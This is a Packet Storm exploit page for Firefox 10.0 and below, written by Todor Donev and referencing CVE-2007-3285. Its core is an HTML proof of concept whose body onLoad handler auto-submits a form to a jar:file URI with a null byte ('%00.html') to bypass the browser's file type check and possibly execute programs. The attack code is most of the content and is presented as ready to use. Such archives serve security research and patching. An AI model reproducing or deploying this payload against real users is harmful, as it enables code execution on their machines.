Mozilla Firefox versions 10.0 and below local null byte bypass file check execution exploit.
512ec27d0b8348d0ba9b0565fbf83b0a<!-- [+] mozilla firefox <= 10.0 local null byte bypass file check execution exploit -->
<!-- -->
<!-- Vuln risk level: Medium -->
<!-- Author: Todor Donev -->
<!-- Author mail: todor.donev@@gmail.com -->
<!-- -->
<!-- Description: Allows local attackers to bypass file type checks and possibly execute programs via a jar: -->
<!-- URI with a dangerous extension.-->
<!-- See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 for more -->
<!-- -->
<!-- Simple exploit for mozilla firefox 10.0, tested on Windows XP SP3 EN -->
<!-- -->
<!-- Greetz Tsvetelina Emirska again.. =) -->
<!-- -->
<html>
<body onLoad=javascript:document.form.submit()>
<form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html"; method="GET" name="form">
</form>
</body>
</html>
<!-- STOP ACTA !!! STOP PIPA !!! STOP SOPA -->
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!